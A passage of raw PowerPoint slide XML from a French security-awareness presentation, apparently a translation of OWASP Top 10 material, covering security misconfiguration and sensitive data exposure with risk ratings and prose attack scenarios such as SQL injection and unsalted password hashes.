                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nouveau point A9).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> architecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>solide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> qui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apporte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>séparation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> entre les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>composants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utiliser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les scans et les audits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aident</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>détection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des futures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mauvaises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> configurations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> absence de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>correctifs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mauvaise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sécurité</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>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A5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="208625" y="1014596"/>
            <a:ext cx="6476503" cy="580794"/>
            <a:chOff x="208625" y="1014596"/>
            <a:chExt cx="6476503" cy="580794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="208625" y="1014596"/>
              <a:ext cx="6476503" cy="580794"/>
              <a:chOff x="208625" y="997424"/>
              <a:chExt cx="6476503" cy="58079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rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnérabilités</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Techniques</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208625" y="1280701"/>
                <a:ext cx="708848"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Agent</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>e menace</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Métier</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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424334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2137644629"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948520"/>
          <a:ext cx="6858000" cy="2533450"/>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8770">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r>
              <a:tr h="374845">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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CH" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Mise en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="1" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>oeuvre</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH" sz="1000" b="1" noProof="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DIFFICILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH" sz="1000" b="1" noProof="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fr-CH" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>PEU COMMUNE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fr-CH" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH"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fr-CH" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH"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fr-CH" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Application/Métier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH"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85650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>tout acteur interne ou externe ayant accès direct aux données sensibles (en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>mé-moire</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, dans des fichiers,  dans les sauvegardes, etc.) ou à un réseau par lequel elles transitent. </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH" sz="1000" noProof="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fr-CH" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>La cryptanalyse (cassage de l’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>algo-rithme</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> ou de la clé)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>reste rare</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. On préfère obtenir les clés, intercepter le trafic ou accéder aux données en clair directement sur le serveur ou dans le navigateur.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH" sz="1000" noProof="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>La principale erreur est de ne pas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>chiffrer les données sensibles. Les autres erreurs fréquentes sont: génération de clés faibles, choix et configuration incorrects des algorithmes et protection insuffisante des mots de passe. Les faiblesses dans le navigateur sont répandues et simples à détecter mais difficiles à exploiter. En général, les faiblesses cryptographiques sont plus difficiles à identifier et exploiter de l’extérieur, en raison d’un accès limité.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH" sz="1000" b="0" noProof="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’exploitation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> peut résulter en la compromission ou la perte de données personnelles, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>médi-cales</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, financières, d’éléments de cartes de crédit ou  d’authentification, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH" sz="1000" noProof="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fr-CH" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CH" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la valeur économique des données perdues, l’impact potentiel pour la réputation de l’organisation ainsi que les implications légales pouvant résulter de leur perte ou leur diffusion.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-CH" sz="1000" noProof="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fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1500" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de scénarii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1500" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Un site web protège des numéros de carte de crédit au moyen d’une fonction de chiffrement transparent (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) du SGBD. Cette méthode induit également un déchiffrement transparent des données lorsqu’elles quittent la base. En exploitant une injection SQL, l’attaquant récupère ainsi les données en clair…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Un site public ne requiert pas SSL lors de la navigation dans la section authentifiée. Un acteur malveillant se connecte à un réseau sans-fil en libre accès et collecte le trafic d'un utilisateur. Il récupère le jeton d'une session authentifiée et accède ainsi aux données et privilèges de l'utilisateur dans l’application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: En exploitant une faille dans une fonction d’envoi de fichiers, un acteur malveillant obtient la base de condensés (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hashs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) de mots de passe. Les condensés ayant été générés sous la forme simple sans sel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), une attaque par table arc-en-ciel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rainbow</a:t>
            </a:r>
            <a:r>
